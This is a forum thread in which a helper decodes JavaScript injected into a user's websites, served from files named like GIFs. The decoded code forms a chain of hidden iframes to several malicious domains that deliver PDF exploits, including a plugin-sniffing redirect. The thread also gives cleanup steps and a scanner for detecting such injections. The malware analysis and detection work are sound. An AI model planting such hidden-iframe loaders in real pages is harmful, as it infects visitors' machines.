Malware attack on my sites

smtemp:
Please help me identify and remove this malware from my sites D: I went to visit my sites and I got these errors (one version is in Safari and another in Firefox). I use a Mac.

http://i17.photobucket.com/albums/b53/smtemp/Picture6.png
http://i17.photobucket.com/albums/b53/smtemp/Picture7.png

I'm going to my own websites and these stupid things pop up and try to force me to download a .pdf. I force-cancel before it gets too far, though. I believe my website host must have been hacked or something. I can't find anything abnormal in my own code on my sites, which are:
http://www.anicoz.com
http://www.ratemycosplay.com

Please help D:

MysteryFCM:
The code in imgratemycosplay_com.gif decodes to:


--- Code: ---document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,97,115,114,101,116,111,107,102,105,110,46,99,111,109,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62));
--- End code ---

Which decodes to:


--- Code: ---<iframe src="http://dasretokfin.com/index.php" width="0" height="0" style="display:none;"></iframe>
--- End code ---

Which contains yet more encoded JS that leads to a fake codec.

The code in imgratemycosplay_com-2.gif decodes to:


--- Code: ---window.status='Done';document.write('<iframe name=282620 src="http://8speed.org/t/?'+Math.round(Math.random()*12002)+'282620'+'" width=353 height=34 style="display:none"></iframe>')
--- End code ---

Which loads:


--- Code: ---<iframe name=9619574bea1 src='http://sexbases.cn/in.cgi?16&cc5f86' width=106 height=52 frameborder='0'></iframe>
--- End code ---

Which loads (changed html to hxml to prevent problems with BBCode breakout):


--- Code: ---<hxml><frameset rows="100%"><frame src="http://sexbases.cn/edit.html"></frameset></hxml>
--- End code ---

Which loads:


--- Code: ---<iframe src=http://firstgate.ru/33/tr.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://sexbases.cn/gr.php width=1 height=1 style="display:none"></iframe>
--- End code ---

firstgate.ru loads a PDF exploit and sexbases.cn loads:


--- Code: ---<iframe src=http://peskufex.cn/ss/in.cgi?9 width=1 height=1 style="display:none"></iframe>
--- End code ---

Which loads another PDF exploit, courtesy of:


--- Code: ---function PDF()
{
  // Walk the browser's plugin list and redirect to the exploit PDF
  // only when an Adobe Acrobat plugin is present.
  for (var i = 0; i < navigator.plugins.length; i++) {
    var name = navigator.plugins[i].name;
    if (name.indexOf("Adobe Acrobat") != -1) {
      location.href = "spl/pdf.pdf";
    }
  }
}
PDF();
--- End code ---

The code in imgratemycosplay_com-3.gif decodes to:


--- Code: ---window.status='Done';document.write('<iframe name=c5642 src="http://8speed.org/t/?'+Math.round(Math.random()*15808)+'c5642'+'" width=208 height=76 style="display:none"></iframe>')
--- End code ---

Which is the same as imgratemycosplay_com-2.gif.

MysteryFCM:
To remove these, first and foremost get your site offline whilst the server is checked to ensure the server itself hasn't been exploited. If the server is clean, upload a CLEAN copy of your site's files, and have your host identify and fix whatever vulnerability allowed them to get in in the first place.

In addition to this, ensure FTP and all other passwords are changed ASAP.
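As an added example (not code from the original thread or from either poster), the following Node.js scanner covers both the decoding work shown above and the "identify" step of the cleanup advice. It decodes String.fromCharCode(...) calls statically instead of running them, flags iframes hidden by display:none or by 0/1-pixel dimensions in the raw text and in every decoded layer, and flags files named like images whose content does not begin with an image magic number (the injected JS in this case was served from files named *.gif). The sample inputs are constructed from the decoded snippets quoted in the thread; the "clean.html" gallery iframe is made up for contrast, and the file names and function names are this example's own.

```javascript
// Added example: static scanner for injected hidden-iframe JavaScript.
// Nothing here is evaluated; payloads are decoded by pattern matching only.

// Magic bytes an honest file with this extension should start with (assumption:
// only these three formats are checked).
const IMAGE_MAGIC = {
  gif: ['GIF87a', 'GIF89a'],
  png: ['\x89PNG'],
  jpg: ['\xFF\xD8'],
  jpeg: ['\xFF\xD8'],
};

// Decode every String.fromCharCode(n, n, ...) call in a chunk of script text
// without evaluating it. Returns one decoded string per call found.
function decodeFromCharCode(source) {
  const re = /String\.fromCharCode\s*\(\s*([0-9\s,]+)\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const codes = m[1]
      .split(',')
      .map((s) => parseInt(s.trim(), 10))
      .filter((n) => !Number.isNaN(n));
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Return the <iframe> tags in a string that are hidden, either through
// style="display:none" or through a 0/1-pixel width or height.
function findHiddenIframes(html) {
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attr = (attrs, name) => {
    const m = attrs.match(new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i'));
    return m ? m[1] : undefined;
  };
  const found = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const hiddenByStyle = /display\s*:\s*none/i.test(attrs);
    const w = Number(attr(attrs, 'width'));
    const h = Number(attr(attrs, 'height'));
    const tiny = (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1);
    if (hiddenByStyle || tiny) {
      found.push({ src: attr(attrs, 'src') || '', reason: hiddenByStyle ? 'display:none' : 'zero-size' });
    }
  }
  return found;
}

// True when a file is named like an image but its content does not start with
// that format's magic bytes (what a *.gif full of document.write() looks like).
function isMismatchedImage(name, content) {
  const ext = (name.split('.').pop() || '').toLowerCase();
  const magics = IMAGE_MAGIC[ext];
  if (!magics) return false;
  return !magics.some((magic) => content.startsWith(magic));
}

// Scan one file: peel nested fromCharCode layers (bounded depth, since payloads
// can wrap payloads), then collect hidden iframes from the raw text and every layer.
function scanFile(name, content) {
  const layers = [];
  let queue = [content];
  for (let depth = 0; depth < 5 && queue.length > 0; depth++) {
    const next = [];
    for (const s of queue) {
      for (const d of decodeFromCharCode(s)) {
        layers.push(d);
        next.push(d);
      }
    }
    queue = next;
  }
  const findings = [];
  for (const text of [content, ...layers]) findings.push(...findHiddenIframes(text));
  return { name, decodedLayers: layers.length, mismatchedImage: isMismatchedImage(name, content), findings };
}

function scanAll(samples) {
  return Object.entries(samples).map(([name, content]) => scanFile(name, content));
}

// Constructed samples, built from the decoded snippets quoted in the thread
// plus one harmless embed that must not be flagged.
const SAMPLES = {
  'imgratemycosplay_com.gif':
    'document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,97,115,114,101,116,111,107,102,105,110,46,99,111,109,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62));',
  'imgratemycosplay_com-2.gif':
    `window.status='Done';document.write('<iframe name=282620 src="http://8speed.org/t/?'+Math.round(Math.random()*12002)+'282620'+'" width=353 height=34 style="display:none"></iframe>')`,
  'edit.html':
    '<iframe src=http://firstgate.ru/33/tr.php width=1 height=1 style="display:none"></iframe>\n' +
    '<iframe src=http://sexbases.cn/gr.php width=1 height=1 style="display:none"></iframe>',
  'clean.html':
    '<p>Gallery</p><iframe src="https://example.com/embed/video" width="560" height="315"></iframe>',
};

for (const r of scanAll(SAMPLES)) {
  const flags = [];
  if (r.mismatchedImage) flags.push('named like an image but has no image magic');
  for (const f of r.findings) flags.push(`hidden iframe (${f.reason}) -> ${f.src}`);
  console.log(`${r.name}: ${flags.length ? flags.join('; ') : 'nothing suspicious'}`);
}
```

In practice you would feed scanFile() every file under the web root (and compare the set of files against a known-clean backup), treating any hit as a reason to follow the cleanup steps above rather than just deleting the one file, since the injection point is the vulnerability, not the payload.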

smtemp:
Thank you!

MysteryFCM:
No problem :)
